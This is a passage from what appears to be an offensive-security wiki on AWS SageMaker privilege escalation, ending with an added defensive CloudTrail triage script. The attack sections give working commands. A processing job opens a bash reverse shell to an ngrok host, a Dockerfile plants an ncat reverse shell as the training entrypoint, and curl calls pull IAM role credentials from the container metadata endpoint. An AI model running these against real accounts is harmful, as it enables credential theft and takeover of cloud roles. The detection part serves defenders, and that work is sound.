The response should contain a `NotebookInstanceArn` field holding the ARN of the newly created notebook instance. Once the instance is ready, the `create-presigned-notebook-instance-url` API can be used to generate a URL that grants access to it:
Go to the URL and click "Open JupyterLab" at the top right, then scroll down to the "Launcher" tab and, under the "Other" section, click the "Terminal" button.
From that terminal it is possible to read the IAM Role credentials from the metadata endpoint.
Potential Impact: Privesc to the sagemaker service role specified.
## `sagemaker:CreatePresignedNotebookInstanceUrl`
If there are Jupyter notebooks already running and you can list them with `sagemaker:ListNotebookInstances` (or discover them in any other way), you can generate a presigned URL for them, access them, and steal the credentials as described in the previous technique.
Potential Impact: Privesc to the sagemaker service role attached.
## `sagemaker:CreateProcessingJob`, `iam:PassRole`
An attacker with those permissions can make sagemaker execute a processing job with a sagemaker role attached. The attacker can specify the definition of the container that will be run in an AWS-managed ECS account instance, and steal the credentials of the attached IAM role.
```bash
# I uploaded a python docker image to the ECR
aws sagemaker create-processing-job \
    --processing-job-name privescjob \
    --processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \
    --app-specification "{\"ImageUri\":\"<id>.dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \
    --role-arn <sagemaker-arn-role>

# In my tests it took 10min to receive the shell
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" # To get the creds
```
Potential Impact: Privesc to the sagemaker service role specified.
## `sagemaker:CreateTrainingJob`, `iam:PassRole`
An attacker with those permissions will be able to create a training job that runs an arbitrary container with a role attached to it. Therefore, the attacker will be able to steal the credentials of that role.
This scenario is harder to exploit than the previous one because you need to build a Docker image that sends the rev shell or the credentials directly to the attacker (the training job configuration does not allow a start command to be specified).
```bash
# Create docker image
mkdir /tmp/rev
## Note that the training job is going to call an executable called "train"
## That's why I'm putting the rev shell in /bin/train
## Set the values of <YOUR-IP-OR-DOMAIN> and <YOUR-PORT>
cat > /tmp/rev/Dockerfile <<EOF
FROM ubuntu
RUN apt update && apt install -y ncat curl
RUN printf '#!/bin/bash\nncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh' > /bin/train
RUN chmod +x /bin/train
CMD ncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh
EOF
cd /tmp/rev
sudo docker build . -t reverseshell

# Upload it to ECR
sudo docker login -u AWS -p $(aws ecr get-login-password --region <region>) <id>.dkr.ecr.<region>.amazonaws.com/<repo>
sudo docker tag reverseshell:latest <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest
sudo docker push <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest

# To get the creds
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
## Creds env var value example: /v2/credentials/proxy-f00b92a68b7de043f800bd0cca4d3f84517a19c52b3dd1a54a37c1eca040af38-customer
```
**Potential Impact:** Privesc to the sagemaker service role specified.
## `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole`
An attacker with those permissions will (potentially) be able to create a **hyperparameter tuning job**, **running an arbitrary container** on it with a **role attached** to it.\
_I haven't exploited it because of a lack of time, but it looks similar to the previous exploits, feel free to send a PR with the exploitation details._
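All four paths above leave a CloudTrail record: `CreatePresignedNotebookInstanceUrl`, and `CreateProcessingJob` / `CreateTrainingJob` whose `roleArn` and container image are attacker-controlled. The following triage routine is an added detection example, not code from the original page: it flags a passed role outside an allowlist, an image outside approved ECR repositories, an overridden container entrypoint, and a presigned notebook URL requested by an unexpected principal. The events, account id, role ARNs, image URIs and user names are constructed, and the camelCase `requestParameters` field names are assumed to follow CloudTrail's usual convention.

```python
# Added detection example, not code from the page: triage CloudTrail records for
# the SageMaker privilege-escalation paths described above. The events, account
# id, role ARNs, image URIs and user names are constructed; requestParameters
# field names follow CloudTrail's camelCase convention for the SageMaker API.
SAMPLE_EVENTS = [
    {"eventName": "CreateProcessingJob",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/dev"},
     "requestParameters": {
         "roleArn": "arn:aws:iam::123456789012:role/SageMakerAdminRole",
         "appSpecification": {
             "imageUri": "123456789012.dkr.ecr.eu-west-1.amazonaws.com/python",
             "containerEntrypoint": ["sh", "-c"]}}},
    {"eventName": "CreateTrainingJob",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/ml-pipeline"},
     "requestParameters": {
         "roleArn": "arn:aws:iam::123456789012:role/SageMakerExecutionRole",
         "algorithmSpecification": {
             "trainingImage": "123456789012.dkr.ecr.eu-west-1.amazonaws.com/approved-xgboost"}}},
    {"eventName": "CreatePresignedNotebookInstanceUrl",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/dev"},
     "requestParameters": {"notebookInstanceName": "research-nb"}},
]
APPROVED_ROLES = {"arn:aws:iam::123456789012:role/SageMakerExecutionRole"}
APPROVED_IMAGE_PREFIXES = ("123456789012.dkr.ecr.eu-west-1.amazonaws.com/approved-",)
APPROVED_NOTEBOOK_USERS = {"arn:aws:iam::123456789012:user/ml-pipeline"}


def triage(events, roles=APPROVED_ROLES, prefixes=APPROVED_IMAGE_PREFIXES,
           nb_users=APPROVED_NOTEBOOK_USERS):
    """Return (eventName, callerArn, reason) tuples for records worth a look."""
    findings = []
    for ev in events:
        name = ev.get("eventName")
        caller = (ev.get("userIdentity") or {}).get("arn", "?")
        p = ev.get("requestParameters") or {}
        if name in ("CreateProcessingJob", "CreateTrainingJob"):
            # Both paths hinge on iam:PassRole: a role outside the allowlist is the key signal.
            if p.get("roleArn") not in roles:
                findings.append((name, caller, "unapproved role passed: %s" % p.get("roleArn")))
            spec = p.get("appSpecification") or p.get("algorithmSpecification") or {}
            image = spec.get("imageUri") or spec.get("trainingImage") or ""
            if not image.startswith(prefixes):
                findings.append((name, caller, "image outside approved repos: %s" % image))
            if spec.get("containerEntrypoint"):  # entrypoint override runs arbitrary commands
                findings.append((name, caller, "entrypoint overridden: %s" % spec["containerEntrypoint"]))
        elif name == "CreatePresignedNotebookInstanceUrl" and caller not in nb_users:
            # The URL yields a terminal running as the notebook's execution role.
            findings.append((name, caller, "presigned URL for %s" % p.get("notebookInstanceName")))
    return findings
```

Running `triage(SAMPLE_EVENTS)` returns three findings for the processing job (role, image, entrypoint) and one for the presigned URL, while the training job from the pipeline user passes cleanly. An `iam:PassRole` policy condition on `iam:PassedToService` = `sagemaker.amazonaws.com` restricted to the approved roles removes the first signal at the source.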
# References
* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/)